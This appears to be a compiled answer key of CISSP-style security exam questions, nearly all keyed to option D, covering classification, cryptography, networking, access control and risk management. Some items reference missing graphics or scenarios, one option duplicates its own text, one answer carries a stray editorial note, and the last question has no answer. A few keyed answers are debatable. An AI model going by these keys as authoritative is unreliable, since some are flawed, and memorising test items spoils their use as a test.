The effect of data aggregation on classification levels is best described by which of the following? A. Data classification standards apply to all the data within an organization. B. Aggregation is a disaster recovery technique with no effect on classification. C. A low-classification aggregation of data can be deconstructed into higher-classification data items. D. Items of low-classification data combine to create a higher-classification set.

D. Items of low-classification data combine to create a higher-classification set.

Which of the following is an example of a credential management system, also known as an identity management (IdM) system? A. A historic log of the activities performed by users once they have presented their credentials to a central authorizing system B. A database of the credentials that have been registered to each individual in an enterprise, in order to correlate users with usernames and locales C. A security information and event management (SIEM) system that contains the logs for various credentialing systems in the enterprise, for correlation of activities by ID D. A Kerberos Key Distribution Center (KDC) that contains the symmetric keys of all the entities and systems in a Kerberos realm, which can be centrally administered to ensure that it is up-to-date with respect to additions and deletions of keys

D. Kerberos is a common solution to credential and identity management, facilitating all the needs of such a system, including the creation of accounts across systems, the assignment of account details and privileges, and the decommissioning of accounts when they are no longer required. It is the core technology behind Microsoft's Active Directory, which is the most common IdM solution in an enterprise environment.

What is a key performance indicator (KPI)? A. Any attribute of the ISMS that can be described as a value B. The value of a factor at a particular point in time C. A derived value that is generated by comparing multiple measurements against each other or against a baseline D. An interpretation of one or more metrics that describes the effectiveness of the ISMS

D. Key performance indicators (KPIs) are used by managers to assess the effectiveness of any critical business function. In the context of security, KPIs are based on metrics and are meant to answer the following question: Are we managing our information security well enough?

Which of the following is the most commonly used implementation of a hierarchical database? A. Directory Access Protocol (DAP). B. X Window System. C. Unix. D. Lightweight Directory Access Protocol.

D. Lightweight Directory Access Protocol (LDAP).

Maria has been tasked with reviewing and ultimately augmenting her organization's physical security. Of the following controls and approaches, which should be her highest priority to ensure are properly implemented? A. Physical facility access controls, such as mechanical and device locks, on all necessary ingress points B. Personnel access controls, such as badges, biometric systems, etc. C. External boundary controls, including perimeter intrusion detection and assessment system (PIDAS) fencing, security guards, etc. D. Layered facility access controls, with multiple internal and external ingress and egress controls

D. Like any other defensive security discipline, physical security can be effectively implemented only via a defense-in-depth strategy, through layered defenses. It must be based on the assumption that a determined attacker will find a way to bypass any specific control, and therefore compensating controls must be deployed to enable the defender to detect and correct for any given failure to prevent a breach. The other possible answers each constitute core components of a layered facility protection regime, but cannot be relied upon individually.

Which of the following approaches is the most effective way for an organization to reduce its liability regarding the protection of private data? A. Collect any and all data that has business utility, but ensure that the legal team has reviewed and approved all policies with respect to its protection. B. Never collect or store any privacy-protected data. C. Limit the amount of private data collected to that which is legally allowed. D. Limit the amount of private data collected to that which is required for business functions.

D. Limit the amount of private data collected to that which is required for business functions.

Code is released "in the wild" and its intent is to start deleting the data off of hard drives on 03-03-03 at 3:33pm. This code is best described as a: A. worm. B. snake. C. Stink bomb. D. Logic Bomb

D. Logic Bomb

Which of the following does not describe a key access control layer? A. Administrative controls, such as policies and procedures, supervisory structures, and security-awareness training. B. Physical controls, such as perimeter security, proper cabling, and work area segmentation. C. Technical controls, such as network architectures, firewalls, and encryption D. Logistical controls, such as product shipments, financial management, and human resource management.

D. Logistical controls, such as product shipments, financial management, and human resource management.

The algorithm that was accepted as the Data Encryption Standard (DES) was? A. El Gamal. B. IDEA C. RC5 D. Lucifer.

D. Lucifer.

In programming, what language type represents data in binary to the processor? A. Electrical signal language. B. Assembly language. C. High-level language. D. Machine language.

D. Machine language.

Who is ultimately responsible for making sure data is classified and protected? A. Data owners B. Users C. Administrators D. Management

D. Management

Alice has to create a physical network topology that is the most fault-tolerant possible, and budget is no object. Which should she implement? A. Bus topology B. Ring topology C. Star topology D. Mesh topology

D. Mesh topology

If different keys generate the same ciphertext for the same message, what is this called? A. Collision B. Secure hashing C. MAC D. Key clustering

D. Message A was encrypted with key A and the result is ciphertext Y. If that same message A were encrypted with key B, the result should not be ciphertext Y; the ciphertext should differ because a different key was used. If the ciphertext is nonetheless the same, the occurrence is referred to as key clustering.

Which of the following is not covered by valuable-paper insurance? A. Inscribed, printed, and written documents B. Manuscripts C. Records D. Money and securities.

D. Money and Securities.

What type of technology is represented in the graphic that follows? A. Asynchronous Transfer Mode B. Synchronous Optical Networks C. Frequency-division multiplexing D. Multiplexing

D. Multiplexing is a method of combining multiple channels of data over a single transmission path. The transmission is so fast and efficient that the ends do not realize they are sharing a line with many other entities. The systems "think" they have the line all to themselves. Telephone systems have been around for about 100 years, and they started as copper-based analog systems. Central switching offices connected individual telephones manually (via human operators) at first, and later by using electronic switching equipment. After two telephones were connected, they had an end-to-end connection, or an end-to-end circuit. Multiple phone calls were divided up and placed on the same wire, which is multiplexing.

Sam has to lay out his company's IDS schematic. The VPN connections stop at the security gateway and there are three SSL connections that take place from the gateway to the database, web server, and file server. Which is the best implementation for this environment? A. HIDS in all segments that need to be monitored and a NIDS on at least the database, web server, and file server. B. NIDS in the DMZ and internal user network and HIDS on each system in the environment. C. NIDS in the DMZ, internal user network, and outside the firewall and HIDS on the database. D. NIDS in all segments that need to be monitored and a HIDS on at least the database, web server, and file server.

D. NIDS in all segments that need to be monitored and a HIDS on at least the database, web server, and file server.

Which of the following is not a main component of CPTED? A. Natural access control B. Natural surveillance C. Territorial reinforcement D. Target hardening

D. Natural access control is the use of the environment to control access to entry points, such as using landscaping and bollards. An example of natural surveillance is the construction of pedestrian walkways so there is a clear line of sight of all the activities in the surroundings. Territorial reinforcement gives people a sense of ownership of a property, giving them a greater tendency to protect it. These concepts are all parts of CPTED. Target hardening has to do with implementing locks, security guards, and proximity devices.

Which problems may be caused by humidity in an area with electrical devices? A. High humidity causes excess electricity, and low humidity causes corrosion. B. High humidity causes corrosion, and low humidity causes static electricity. C. High humidity causes power fluctuations, and low humidity causes static electricity. D. High humidity causes corrosion, and low humidity causes power fluctuations.

B. High humidity causes corrosion, and low humidity causes static electricity. The explanation previously listed here belonged to the CPTED question; the humidity question's answer is B, not D.

As a security analyst writing a technical report about the findings of a technical security assessment, what should your primary goal be? A. Detailing as much of the raw data that went into the report as possible so that operations staff has absolutely everything they need to understand the issues that need to be remediated B. Providing step-by-step remediation advice for each of the most critical findings so that corrections can be deployed as easily and rapidly as possible C. Distilling the findings of the assessment into an executive summary, accessible to all levels of management D. Constructing a cogent and compelling narrative that will persuade the intended audience to enact the measures necessary to reduce critical risks to the business mission, based on an honest and factual analysis

D. No amount of raw details, step-by-step remediation instructions, or easily digestible high-level overview presented following a security assessment will matter if the resulting report is not delivered in a compelling and convincing manner. Beyond what is important and what must be done about it, why it is important must be the key takeaway.

The use of "resource servers" and "authorization servers" to enable a "client" web service (such as LinkedIn) to access a "resource owner" (such as Google) for federated authorization is a hallmark of what open standard? A. OpenID B. SAML C. SSO D. OAuth

D. OAuth is an open standard for website-to-website authorization (not authentication). It is used to allow an account that a user is authenticated to on one site to access resources on another third-party site.

What is COBIT and where does it fit into the development of information security systems and security programs? A. Lists of standards, procedures, and policies for security program development B. Current version of ISO 17799 C. A framework that was developed to deter organizational internal fraud D. Open standards for control objectives

D. Open standards for control objectives

Which of the following protocols would an Identity as a Service (IDaaS) provider use to authenticate you to a third party? A. Diameter B. OAuth C. Kerberos D. OpenID

D. OpenID is an open standard for user authentication by third parties. Though it is possible to use OAuth, which is an authorization standard, for authentication, you would do so by leveraging its OpenID Connect layer. Diameter and Kerberos are not well-suited for IDaaS.

If Joe wanted to use a risk assessment methodology that allows the various business owners to identify risks and know how to deal with them, what methodology would he use? A. Qualitative B. COSO C. FRAP D. OCTAVE

D. Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) is a methodology that is intended to be used in situations where people manage and direct the risk evaluation for information security within their company. This places the people who work inside the organization in the position of being able to make decisions regarding the best approach for evaluating the security of their organization.

Which of the following is not a purpose to develop and implement a disaster recovery plan? A. Provides procedures for emergency responses. B. Extends backup operations to include more than just backing up data. C. Provides steps for a post-disaster recovery. D. Outlines business functions and systems.

D. Outlines business functions and systems.

Which of the following is not a characteristic of the Protected Extensible Authentication Protocol? A. Authentication protocol used in wireless networks and point-to-point connections B. Designed to provide authentication for 802.11 WLANs C. Designed to support 802.1X port access control and Transport Layer Security D. Designed to support password-protected connections

D. PEAP is a version of EAP and is an authentication protocol used in wireless networks and point-to-point connections. PEAP is designed to provide authentication for 802.11 WLANs, which support 802.1X port access control and TLS. It is a protocol that encapsulates EAP within a potentially encrypted and authenticated TLS tunnel.

What is the technology that allows a user to remember just one password? A. Password generation B. Password dictionaries C. Password rainbow tables D. Password synchronization

D. Password synchronization technologies can allow a user to maintain just one password across multiple systems. The product will synchronize the password to other systems and applications, which happens transparently to the user.

All of the following controls are important to specify when defining a data classification scheme, except: A. Marking, labeling, and handling procedures. B. Physical security protections C. Backup and recovery procedures D. Personnel clearance procedures.

D. Personnel clearance procedures.

The most costly countermeasure to reducing physical security risks is often: A. Procedural controls B. Hardware devices C. Electronic controls D. Personnel.

D. Personnel.

What type of exploited vulnerability allows more input than the program has allocated space to store it? A. Symbolic links B. File descriptors C. Kernel flaws D. Buffer overflows

D. Poor programming practices allow more input than the software has allocated space to store it. This overwrites data or program memory after the end of the allocated buffer, and sometimes it allows the attacker to inject program code and then cause the processor to execute it in what is called a buffer overflow. This gives the attacker the same level of access as that held by the software that was successfully attacked. If the program was run as an administrative user or by the system itself, this can mean complete access to the system. Good programming practice, automated source code scanners, enhanced programming libraries, and strongly typed languages that disallow buffer overflows are all ways of reducing this type of vulnerability.

What does positive pressurization pertaining to ventilation mean? A. When a door opens, the air comes in. B. When a fire takes place, the power supply is disabled. C. When a fire takes place, the smoke is diverted to one room. D. When a door opens, the air goes out.

D. Positive pressurization means that when someone opens a door, the air goes out, and outside air does not come in. If a facility were on fire and the doors were opened, positive pressure would cause the smoke to go out instead of being pushed back into the building.

Which of the following criteria is the most important consideration for the selection and deployment of a biometric authentication system? A. False acceptance rate (FAR) or Type II error rate B. False rejection rate (FRR) or Type I error rate C. Crossover error rate (CER) or equal error rate (EER) D. Processing speed

D. Processing speed is the length of time it takes a biometric system to actually authenticate a user upon the presentation of the body part. Regardless of how well a system can be tuned with respect to FAR, FRR, or CER, unless the system can process a sufficient throughput of individuals in actual deployment, it will become a costly bottleneck. Much as different systems have different thresholds for accuracy, they have differing thresholds for throughput, based on the body part being used for authentication.

There are several security enforcement components that are commonly built into operating systems. Which component is illustrated in the graphic that follows? A. Virtual machines B. Interrupt C. Cache memory D. Protection rings

D. Protection Rings.

Which of the following correctly describes the difference between public key cryptography and public key infrastructure? A. Public key cryptography is the use of an asymmetric algorithm, while public key infrastructure is the use of a symmetric algorithm. B. Public key cryptography is used to create public/private key pairs, while public key infrastructure is used to perform key exchange and integrity. C. public key cryptography provides authentication and nonrepudiation, while public key infrastructure provides confidentiality and integrity. D. Public key cryptography is another name for asymmetric cryptography, while public key infrastructure consists of public key cryptographic mechanisms.

D. Public key cryptography is another name for asymmetric cryptography, while public key infrastructure consists of public key cryptographic mechanisms.

Which of the following has an incorrect definition mapping? A. Zeroization - overwriting with a pattern designed to ensure that the data formerly on the media are not practically recoverable. B. Degaussing - magnetic scrambling of the patterns on a tape or disk that represent the information stored there. C. Destruction - shredding, crushing, burning. D. Purging - making information recoverable with extraordinary effort such as physical forensics in a laboratory.

D. Purging - making information recoverable with extraordinary effort such as physical forensics in a laboratory.

Which of the following refers to the data left on the media after the media has been erased? A. Semi-hidden B. Dregs C. Sticky bits D. Residual

D. Residual.

Which of the following is a responsibility of the memory manager? A. Use complex controls to ensure integrity and confidentiality when processes need to use the same shared memory segments. B. Limit processes to interact only with the memory segments assigned to them. C. Swap contents from RAM to the hard drive as needed. D. Run an algorithm to identify unused committed memory and inform the operating system that the memory is available.

D. Run an algorithm to identify unused committed memory and inform the operating system that the memory is available.

Which of the following roles has the responsibility for implementing and maintaining firewalls? A. Security supervisor B. System owner C. Data Custodian D. Security Administrator.

D. Security Administrator.

The company's partners need to integrate compatible authentication functionality into their web portals to allow for interoperability across the different company boundaries. Which of the following will deal with this issue? A. Service Provisioning Markup Language B. Simple Object Access Protocol C. Extensible Access Control Markup Language D. Security Assertion Markup Language

D. Security Assertion Markup Language allows the exchange of authentication and authorization data to be shared between security domains. It is one of the most commonly used approaches to allow for single sign-on capabilities within a web-based environment.

It is important that organizations ensure that their security efforts are effective and measurable. Which of the following is not a common method used to track the effectiveness of security efforts? A. Service level agreement B. Return on investment C. Balanced scorecard system D. Provisioning system

D. Security effectiveness deals with metrics, meeting service level agreement (SLA) requirements, achieving return on investment (ROI), meeting set baselines, and providing management with a dashboard or balanced scorecard system. These are ways to determine how useful the current security solutions and architecture as a whole are performing.

Use the following scenario to answer Questions 16-18. A server that houses sensitive data has been stored in an unlocked room for the last few years at Company A. The door to the room has a sign on the door that reads "Room 1." This sign was placed on the door with the hope that people would not look for important servers in this room. Realizing this is not optimum security, the company has decided to install a reinforced lock and server cage for the server and remove the sign. The company has also hardened the server's configuration and employed strict operating system access controls. The fact that the server has been in an unlocked room marked "Room 1" for the last few years means the company was practicing which of the following? A. Logical security B. Risk management C. Risk transference D. Security through obscurity

D. Security through obscurity

Which of the following multiplexing technologies analyzes statistics related to the typical workload of each input device and makes real-time decisions on how much time each device should be allocated for data transmission? A. Time-division multiplexing B. Wave-division multiplexing C. Frequency-division multiplexing D. Statistical time-division multiplexing

D. Statistical time-division multiplexing (STDM) transmits several types of data simultaneously across a single transmission line. STDM technologies analyze statistics related to the typical workload of each input device and make real-time decisions on how much time each device should be allocated for data transmission.

Synthetic transactions are best described as A. Real user monitoring (RUM) B. Transactions that fall outside the normal purpose of a system C. Transactions that are synthesized from multiple users' interactions with the system D. A way to test the behavior and performance of critical services

D. Synthetic transactions are those that simulate the behavior of real users, but are not the result of real user interactions with the system. They allow an organization to ensure that services are behaving properly without having to rely on user complaints to detect problems.

Which of the following protocols is considered connection-oriented? A. IP B. ICMP C. UDP D. TCP

D. TCP is the only connection-oriented protocol listed. A connection-oriented protocol provides reliable connectivity and data transmission, while a connectionless protocol provides unreliable connections and does not promise or ensure data transmission.

Which of the following best describes TCP versus UDP? A. TCP provides more services and is more reliable, but UDP provides more security services. B. TCP provides a best-effort delivery, and UDP sets up a virtual connection with the destination. C. TCP is reliable, and UDP deals with flow control and ACKs. D. TCP provides more services and is more reliable in data transmission, whereas UDP takes less resources and overhead to transmit data.

D. TCP provides more services and is more reliable in data transmission, whereas UDP takes less resources and overhead to transmit data.

Which of the following is a purpose of the transport layer? A. The hop-by-hop delivery of packets from one network to another B. Representing data in a structure that can be understood by processes at the endpoints C. Encapsulating the IP packet for transport D. Ensuring reliable data transfer

D. TCP, at the transport layer, provides for reliable data segment delivery, sequencing, and flow control, among other assurances.

Which attack inserts an irrational value into an oversized packet, making it difficult for the destination router to reassemble it? A. Remedy B. Ping of death C. Garble D. Teardrop

D. Teardrop

What is social engineering? A. Creating functional social relationships in the workplace in order to facilitate better productivity. B. Techniques designed to convince employees who do not cooperate well to get along better. C. Undermining enterprise productivity by subverting social processes. D. Techniques designed to manipulate employees so that they violate security protocols.

D. Techniques designed to manipulate employees so that they violate security protocols.

Guidelines should be followed to allow secure remote administration. Which of the following is not one of those guidelines? A. A small number of administrators should be allowed to carry out remote functionality. B. Critical systems should be administered locally instead of remotely. C. Strong authentication should be in place. D. Telnet should be used to send commands and data.

D. Telnet should not be allowed for remote administration because it sends all data, including administrator credentials, in cleartext. This type of communication should go over more secure protocols, as in SSH.

When multiple databases exchange transactions, each database is updated. This can happen many times and in many different ways. To protect the integrity of the data, databases should incorporate a concept known as an ACID test. What does this acronym stand for? A. Availability, confidentiality, integrity, durability B. Availability, consistency, integrity, durability C. Atomicity, confidentiality, isolation, durability D. Atomicity, consistency, isolation, durability

D. The ACID test concept should be incorporated into the software of a database. ACID stands for: Atomicity: Divides transactions into units of work and ensures that either all modifications take effect or none take effect. Either the changes are committed or the database is rolled back. Consistency: A transaction must follow the integrity policy developed for that particular database and ensure that all data is consistent in the different databases. Isolation: Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed. Durability: Once the transaction is verified as accurate on all systems, it is committed and the databases cannot be rolled back.

Which of the following is true about information flow models? A. The simple security rule of Bell-LaPadula dictates that a subject may not read data from a higher security level, in order to implement data integrity. B. The *-integrity rule of Biba dictates that a subject may not write data to an object at a higher integrity level, in order to implement confidentiality. C. The simple integrity rule of Biba dictates that a subject cannot write data to a lower integrity level, in order to implement integrity. D. The *-property rule of Bell-LaPadula dictates that a subject cannot write data to a lower security level, in order to implement confidentiality.

D. The Bell-LaPadula model is concerned with confidentiality, and the *-property rule dictates "no write down" in order to avoid declassifying data.

Which access control method is considered user-directed? A. Nondiscretionary B. Mandatory C. Identity-based D. Discretionary

D. The DAC model allows users, or data owners, the discretion of letting other users access their resources. DAC is implemented by ACLs, which the data owner can configure.

The approach of employing an integrated product team (IPT) for software development is designed to achieve which of the following objectives? A. Developing and testing software with fewer security flaws B. Developing and testing software with fewer defective features C. Developing and testing software that will be most profitable D. Developing and testing software best suited to the deployment environment

D. The IPT approach to the integration between development and operations (DevOps) is specifically designed to ensure that the development team is building software in an environment that is as close as possible to the deployment environment and understands the deployment environment's operational necessities.

Which of the following frameworks is a two-dimensional model that uses six basic communication interrogatives intersecting with different viewpoints to give a holistic understanding of the enterprise? A. SABSA B. TOGAF C. CMMI D. Zachman

D. The Zachman Framework is a two-dimensional model that uses six basic communication interrogatives (What, How, Where, Who, When, and Why) intersecting with different viewpoints (Planner, Owner, Designer, Builder, Implementer, and User) to give a holistic understanding of the enterprise. This framework was developed in the 1980s and is based on the principles of classical business architecture that contain rules that govern an ordered set of relationships.

Metro Ethernet is a MAN protocol that can work in network infrastructures made up of access, aggregation, metro, and core layers. Which of the following best describes these network infrastructure layers? A. The access layer connects the customer's equipment to a service provider's aggregation network. B. Aggregation occurs on a core network. The metro layer is the metropolitan area network. The core connects different metro networks. C. The access layer connects the customer's equipment to a service provider's core network. Aggregation occurs on a distribution network at the core. The metro layer is the metropolitan area network. D. The access layer connects the customer's equipment to a service provider's aggregation network. Aggregation occurs on a distribution network. The metro layer is the metropolitan area network. The core connects different access layers. The access layer connects the customer's equipment to a service provider's aggregation network. Aggregation occurs on a distribution network. The metro layer is the metropolitan area network. The core connects different metro networks.

D. The access layer connects the customer's equipment to a service provider's aggregation network. Aggregation occurs on a distribution network. The metro layer is the metropolitan area network. The core connects different metro networks.

In a VoIP environment, the Real-time Transport Protocol (RTP) and RTP Control Protocol (RTCP) are commonly used. Which of the following best describes the difference between these two protocols? A. RTCP provides a standardized packet format for delivering audio and video over IP networks. RTP provides out-of-band statistics and control information to provide feedback on QoS levels. B. RTP provides a standardized packet format for delivering data over IP networks. RTCP provides control information to provide feedback on QoS levels. C. RTP provides a standardized packet format for delivering audio and video over MPLS networks. RTCP provides control information to provide feedback on QoS levels. D. RTP provides a standardized packet format for delivering audio and video over IP networks. RTCP provides out-of-band statistics and control information to provide feedback on QoS levels.

D. The actual voice stream is carried on media protocols such as the Real-time Transport Protocol (RTP). RTP provides a standardized packet format for delivering audio and video over IP networks. RTP is a session layer protocol that carries data in media stream format, as in audio and video, and is used extensively in VoIP, telephony, video conferencing, and other multimedia streaming technologies. It provides end-to-end delivery services and is commonly run over the transport layer protocol UDP. RTP Control Protocol (RTCP) is used in conjunction with RTP and is also considered a session layer protocol. It provides out-of-band statistics and control information to provide feedback on QoS levels of individual streaming multimedia sessions.

On your first day in a new job, you are invited to a meeting with attorneys representing a company for which your company provides infrastructure services. You learn that there is a major investigation underway into allegations that one of your company's system administrators improperly accessed mailboxes belonging to this client. Based on what you know so far, which type of investigation is this likeliest to be? A. Administrative B. Regulatory C. Criminal D. Civil

D. The allegations, depending on the details, could point to any of the four types of investigations. However, since you are meeting with attorneys representing this client, it is likeliest that they are considering (or taking) civil action against your company. None of the other three types of investigations would normally involve meetings with a client's attorneys. As an aside, in this situation you would obviously want to ensure that your own company's attorneys were present too.

Which of the following attack types best describes what commonly takes place when you insert specially crafted and excessively long data into an input field? A. Traversal attack B. Unicode encoding attack C. URL encoding attack D. Buffer overflow attack

D. The buffer overflow is probably the most notorious of input validation mistakes. A buffer is an area reserved by an application to store something in it, such as some user input. After the application receives the input, an instruction pointer points the application to do something with the input that's been put in the buffer. A buffer overflow occurs when an application erroneously allows an invalid amount of input to be written into the buffer area, overwriting the instruction pointer in the code that tells the program what to do with the input. Once the instruction pointer is overwritten, whatever code has been placed in the buffer can then be executed, all under the security context of the application.

What type of telecommunication technology is illustrated in the graphic that follows? A. Digital Subscriber Line B. Integrated Services Digital Network C. BRI ISDN D. Cable modem

D. The cable television companies have been delivering television services to homes for years, and then they started delivering data transmission services for users who have cable modems and want to connect to the Internet at high speeds. Cable modems provide high-speed access, up to 50 Mbps, to the Internet through existing cable coaxial and fiber lines. The cable modem provides upstream and downstream conversions. Not all cable companies provide Internet access as a service, mainly because they have not upgraded their infrastructure to move from a one-way network to a two-way network. Once this conversion takes place, data can come down from a central point (referred to as the head) to a residential home and back up to the head and onto the Internet.

ISO/IEC 27000 is a growing family of ISO/IEC information security management system (ISMS) standards. It comprises information security standards published jointly by the International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC). Which of the following provides an incorrect mapping of the individual standards that make up this family of standards? A. ISO/IEC 27002: Code of practice for information security management B. ISO/IEC 27003: Guideline for ISMS implementation C. ISO/IEC 27004: Guideline for information security management measurement and metrics framework D. ISO/IEC 27005: Guideline for bodies providing audit and certification of information security management systems

D. The correct mappings for the individual standards are as follows: ISO/IEC 27002: Code of practice for information security management ISO/IEC 27003: Guideline for ISMS implementation ISO/IEC 27004: Guideline for information security management measurement and metrics framework ISO/IEC 27005: Guideline for information security risk management ISO/IEC 27006: Guideline for bodies providing audit and certification of information security management systems

A risk management program must be developed properly and in the right sequence. Which of the following provides the correct sequence for the steps listed? i. Develop a risk management team. ii. Calculate the value of each asset. iii. Identify the vulnerabilities and threats that can affect the identified assets. iv. Identify company assets to be assessed. A. i, iii, ii, iv B. ii, i, iv, iii C. iii, i, iv, ii D. i, iv, ii, iii

D. The correct steps for setting up a risk management program are as follows: Develop a risk management team. Identify company assets to be assessed. Calculate the value of each asset. Identify the vulnerabilities and threats that can affect the identified assets.

Of the following steps that describe the development of a botnet, which best describes the step that comes first? A. Infected server sends attack commands to the botnet. B. Spammer pays a hacker for use of a botnet. C. Controller server instructs infected systems to send spam to mail servers. D. Malicious code is sent out that has bot software as its payload.

D. The creation of a botnet begins with the hacker sending systems malicious code that has the bot software as its payload. A bot is a piece of dormant code that carries out functionality for its master. Also known as a zombie, the code can be used to forward items sent to it as in spam or attack commands. The zombie code sends a message to the attacker indicating that a specific system has been compromised and can be used by the attacker. When an attacker has a collection of these compromised systems, it is referred to as a botnet.

Layer 2 of the OSI model has two sublayers. What are those sublayers, and what are two IEEE standards that describe technologies at that layer? A. LCL and MAC; IEEE 802.2 and 802.3 B. LCL and MAC; IEEE 802.1 and 802.3 C. Network and MAC; IEEE 802.1 and 802.3 D. LLC and MAC; IEEE 802.2 and 802.3

D. The data link layer, or Layer 2, of the OSI model is responsible for adding a header and a trailer to a packet to prepare the packet for the local area network or wide area network technology binary format for proper line transmission. Layer 2 is divided into two functional sublayers. The upper sublayer is the Logical Link Control (LLC) and is defined in the IEEE 802.2 specification. It communicates with the network layer, which is immediately above the data link layer. Below the LLC is the Media Access Control (MAC) sublayer, which specifies the interface with the protocol requirements of the physical layer. Thus, the specification for this layer depends on the technology of the physical layer. The IEEE MAC specification for Ethernet is 802.3, Token Ring is 802.5, wireless LAN is 802.11, and so on. When you see a reference to an IEEE standard, such as 802.11 or 802.16, it refers to the protocol working at the MAC sublayer of the data link layer of the protocol stack.

There are two main functions that Trusted Platform Modules (TPMs) carry out within systems today. Which of the following best describes these two functions? A. Sealing a hard disk drive is when the decryption key that can be used to decrypt data on the drive is stored on the TPM. Binding is when data pertaining to the system's state is hashed and stored on the TPM. B. Binding a hard disk drive is when whole-disk encryption is enabled through the use of the TPM. Sealing is when a digital certificate is sealed within a TPM and the system cannot boot up without this certificate being validated. C. Sealing a hard disk drive is when whole-disk encryption is enabled through the use of the TPM. Binding is when a digital certificate is sealed within a TPM and the system cannot boot up without this certificate being validated. D. Binding a hard disk drive is when the decryption key that can be used to decrypt data on the drive is stored on the TPM. Sealing is when data pertaining to the system's state is hashed and stored on the TPM.

D. The essence of the TPM lies in a protected and encapsulated microcontroller security chip that provides a safe haven for storing and processing security-intensive data such as keys, passwords, and digital certificates. "Binding" a hard disk drive is the most common usage scenario of the TPM—where the content of a given hard disk drive is affixed with a particular computing system. Another application of the TPM is "sealing" a system's state to a particular hardware and software configuration.

Who was involved in developing the first public key algorithm? A. Adi Shamir B. Ross Anderson C. Bruce Schneier D. Martin Hellman

D. The first released public key cryptography algorithm was developed by Whitfield Diffie and Martin Hellman.

Databases can record transactions in real time, which usually updates more than one database in a distributed environment. This type of complexity can introduce many integrity threats, so the database software should implement the characteristics of what's known as the ACID test. Which of the following are incorrect characteristics of the ACID test? i. Atomicity: Divides transactions into units of work and ensures that all modifications take effect or none take effect. ii. Consistency: A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases. iii. Isolation: Transactions execute in isolation until completed, without interacting with other transactions. iv. Durability: Once the transaction is verified as inaccurate on all systems, it is committed and the databases cannot be rolled back. A. i, ii B. ii, iii C. ii, iv D. iv

D. The following are correct characteristics of the ACID test: Atomicity Divides transactions into units of work and ensures that all modifications take effect or none take effect. Either the changes are committed or the database is rolled back. Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases. Isolation Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed. Durability Once the transaction is verified as accurate on all systems, it is committed and the databases cannot be rolled back.

You come across an advanced piece of polymorphic malware that uses a custom communications protocol for network traffic. This protocol has a distinctive signature in its header. Which tool is best suited to mitigate this malware by preventing the packets from traversing the network? A. Antimalware B. Stateful firewall C. Intrusion detection system (IDS) D. Intrusion prevention system (IPS)

D. The intrusion prevention system is the best answer because these systems can stop packets containing specific signatures. Although some antimalware software might be able to do this also, this functionality is not a universal feature in this sort of solution.

Instead of managing and maintaining many different types of security products and solutions, Joan wants to purchase a product that combines many technologies into one appliance. She would like to have centralized control, streamlined maintenance, and a reduction in stovepipe security solutions. Which of the following would best fit Joan's needs? A. Dedicated appliance B. Centralized hybrid firewall applications C. Hybrid IDS\IPS integration D. Unified threat management

D. The list of security solutions most companies need includes, but is not limited to, firewalls, antimalware, antispam, IDS\IPS, content filtering, data leak prevention, VPN capabilities, continuous monitoring, and reporting. Unified threat management (UTM) appliance products have been developed that provide all (or many) of these functionalities into a single network appliance. The goals of UTM are simplicity, streamlined installation and maintenance, centralized control, and the ability to understand a network's security from a holistic point of view.

What is the difference between security training and a security awareness program, and which is most important? A. A security awareness program addresses all employees regardless of role, whereas security training is role-specific. The awareness program is most important. B. A security awareness program focuses on specific roles, whereas security training addresses the needs of all employees. Both are equally important. C. A security awareness program focuses on specific roles, whereas security training addresses the needs of all employees. Training is most important. D. A security awareness program addresses all employees regardless of role, whereas security training is role-specific. Both are equally important.

D. The main difference between a security awareness program and security training is the focus on employee role. All employees have a role in maintaining enterprise security, so awareness of the threats and their responsibilities to be mindful of them is the goal of an awareness program. Conversely, some employee roles require skill-specific training in security because it is an inherent part of their job. This requires specific security training. Regardless of the difference between the two, both are absolutely equally required for an enterprise to be secure.

There are common cloud computing service models. __________________ usually requires companies to deploy their own operating systems, applications, and software onto the provided infrastructure. __________________ is the software environment that runs on top of the infrastructure. In the __________________ model the provider commonly gives the customers network-based access to a single copy of an application. A. Platform as a Service, Infrastructure as a Service, Software as a Service B. Platform as a Service, Platform as Software, Application as a Service C. Infrastructure as a Service, Application as a Service, Software as a Service D. Infrastructure as a Service, Platform as a Service, Software as a Service

D. The most common cloud service models are Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS).

If SSL is being used to encrypt the messages that are transmitted over the network, what is the major concern of the security professional? A. The network segments that have systems that use different versions of SSL. B. If the user encrypted the message with an application layer product, it will be incompatible with SSL. C. Network tapping and wiretapping. D. The network segments that the message will travel on that the company does not control.

D. The network segments that the message will travel on that the company does not control.

Which of the following unauthorized activities have most likely been taking place in this situation? A. DNS querying B. Phishing C. Forwarding D. Zone transfer

D. The primary and secondary DNS servers synchronize their information through a zone transfer. After changes take place to the primary DNS server, those changes must be replicated to the secondary DNS server. It is important to configure the DNS server to allow zone transfers to take place only between the specific servers. Attackers can carry out zone transfers to gather very useful network information from victims' DNS servers. Unauthorized zone transfers can take place if the DNS servers are not properly configured to restrict this type of activity.

David is preparing a server room at a new branch office. What locking mechanism should he use for the primary and secondary server room entry doors? A. The primary and secondary entrance doors should have access controlled through a swipe or cipher lock. B. The primary entrance door should have access controlled through a security guard. The secondary doors should be secured from the inside and allow no entry. C. The primary entrance door should have access controlled through a swipe card or cipher lock. The secondary doors should have a security guard. D. The primary entrance door should have access controlled through a swipe card or cipher lock. Secondary doors should be secured from the inside and allow no entry.

D. The primary entrance door should have access controlled through a swipe card or cipher lock. Secondary doors should be secured from the inside and allow no entry.

Business continuity plans address all of the following except: A. Critical servers used on the company's LAN B. The most critical devices housed in the main data center. C. Individual workstations that are used by operations personnel D. The protection of cold sites at a remote location.

D. The protection of cold sites at a remote location.

When classifying an information asset, which of the following is true concerning its sensitivity? A. It is commensurate with how its loss would impact the fundamental business processes of the organization. B. It is determined by its replacement cost. C. It is determined by the product of its replacement cost and the probability of its compromise. D. It is commensurate with the losses to an organization if it were revealed to unauthorized individuals.

D. The sensitivity of information is commensurate with the losses to an organization if that information were revealed to unauthorized individuals. Its criticality, on the other hand, is an indicator of how the loss of the information would impact the fundamental business processes of the organization. While replacement costs could factor into a determination of criticality, they almost never do when it comes to sensitivity.

Which of the following is normally not an element of e-Discovery? A. Identification B. Preservation C. Production D. Remanence

